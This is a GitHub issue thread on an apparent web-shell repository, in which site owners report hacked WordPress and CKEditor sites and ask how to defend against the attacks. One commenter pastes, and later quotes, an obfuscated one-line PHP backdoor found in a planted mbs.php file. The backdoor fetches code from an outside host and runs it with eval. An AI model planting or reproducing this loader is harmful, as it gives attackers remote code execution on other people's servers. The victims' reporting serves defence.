### ISSUE TITLE
Using this someone hacked one of my client website (Kindly help & support)

### ISSUE THREAD

**Issue by abhisehgal1997** [0x5a455553/MARIJUANA#2]
Using this someone hacked one of my client website (Kindly help & support do not misuse)
I have already reported a cybercrime report and made the complaints and the cell is in fetching all possible sources.

**Comment by inz-hagy** [comment]
Same here. I think my kcfinder in CKEditor was the problem. files was removed but still need to fix it in future.

**Comment by tatoosa** [comment]
Same here.

**Comment by parmarkamlesh** [comment]
Same here someone put one file named mbs.php in root folder of my wordpress site.
mbs.php file contains.
```<?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://cbt.smkangkasa2margahayu.sch.id/mjl.txt"));/**/?>```

Fortunately. duing maintaince i saw suspicious file and deleted

**Comment by parmarkamlesh** [comment]
> 
> 
> Same here someone put one file named mbs.php in root folder of my wordpress site.
> mbs.php file contains.
> `<?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://cbt.smkangkasa2margahayu.sch.id/mjl.txt"));/**/?>`
> 
> Fortunately. duing maintaince i saw suspicious file and deleted

Anyone know how to prevent this. because whoever put this files in my server he will again try same method to hack my site

**Comment by tatoosa** [comment]
they say that wordfence can woks... but for me not.... how does it work?

**Comment by parmarkamlesh** [comment]
> 
> 
> they say that wordfence can woks... but for me not.... how does it work?

Dont know. wordfence is paid just like sucuri. Owner of this repo. please if you create any tool related to hacking or security break. also Add ways to prevent this. because people are using these tools wrong way.

**Comment by tatoosa** [comment]
please read this : https://securityboulevard.com/2020/12/obfuscation-techniques-in-marijuana-shell-bypass/

but i dont understand
